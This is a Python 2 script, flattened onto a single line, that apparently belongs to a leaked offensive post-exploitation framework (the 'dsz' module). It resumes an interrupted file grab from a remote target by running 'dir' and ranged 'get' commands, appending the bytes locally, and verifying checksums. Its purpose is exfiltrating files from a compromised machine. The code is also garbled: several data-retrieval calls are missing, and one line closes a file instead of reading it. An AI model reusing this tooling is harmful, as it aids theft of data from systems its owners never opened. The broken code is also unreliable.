import dsz import dsz.lp import dsz.file import os, sys, stat def main(): usage() localFile = str(raw_input('Enter partial file: ')) if (not os.path.exists(localFile)): safePrint('Local file does not exist...') return True getFile = str(raw_input('Enter path of file to get: ')) dirCmd = ('dir %s' % getFile) if dsz.cmd.Run(dirCmd, dsz.RUN_FLAG_RECORD): size = '' try:'diritem::fileitem::name', dsz.TYPE_STRING) [size] ='diritem::fileitem::size', dsz.TYPE_INT) [targetPath] ='diritem::path', dsz.TYPE_STRING) except: safePrint('Could not find file') return True size = int(size) safePrint('File Exists...Starting SYNC\n') getCmd = makeGetCmd(localFile, getFile, size) if (not getCmd): safePrint('Exiting...') return False if dsz.cmd.Run(getCmd, dsz.RUN_FLAG_RECORD): [tmpName] ='FileLocalName::localname', dsz.TYPE_STRING) combine(localFile, tmpName) if checksum(localFile, getFile, targetPath): return True else: return False else: safePrint('Error getting file...') return True def checksum(localFile, targetFile, targetPath): safePrint('Comparing hashes') localPath = str(dsz.lp.GetLogsDirectory()).strip() checksum_cmd = ('checksum %s %s\\GetFiles %s %s' % (localFile.split('\\')[(-1)], localPath, targetFile.split('\\')[(-1)], targetPath)) if dsz.cmd.Run(checksum_cmd, dsz.RUN_FLAG_RECORD): safePrint('Hashes match!') return True else: safePrint('Hash mismatch') return False def combine(localFile, tmpFile): tmpFile = os.path.join(('%s\\GetFiles' % str(dsz.lp.GetLogsDirectory()).strip()), tmpFile) safePrint('Making file writeable') os.chmod(localFile, stat.S_IWRITE) f1 = open(localFile, 'ab') localSize = int(os.stat(localFile).st_size) safePrint(('Local File Size is %d Bytes' % localSize)) f2 = open(tmpFile, 'rb') tmpData = f2.close() f1.write(tmpData) tmpData = '' f1.close() os.chmod(localFile, stat.S_IREAD) os.chmod(tmpFile, stat.S_IWRITE) os.remove(tmpFile) safePrint('\n## File has been combined successfully! ##') return True def makeGetCmd(localFile, getFile, size): localSize = int(os.stat(localFile).st_size) if (size == localSize): safePrint('File sizes are the same...returning') return False getCmd = ('get %s -range %d -name tmpget' % (getFile, localSize)) data = '' return getCmd def usage(): safePrint('Usage: python windows\\') def safePrint(strInput): print strInput.encode('utf8') if (__name__ == '__main__'): main()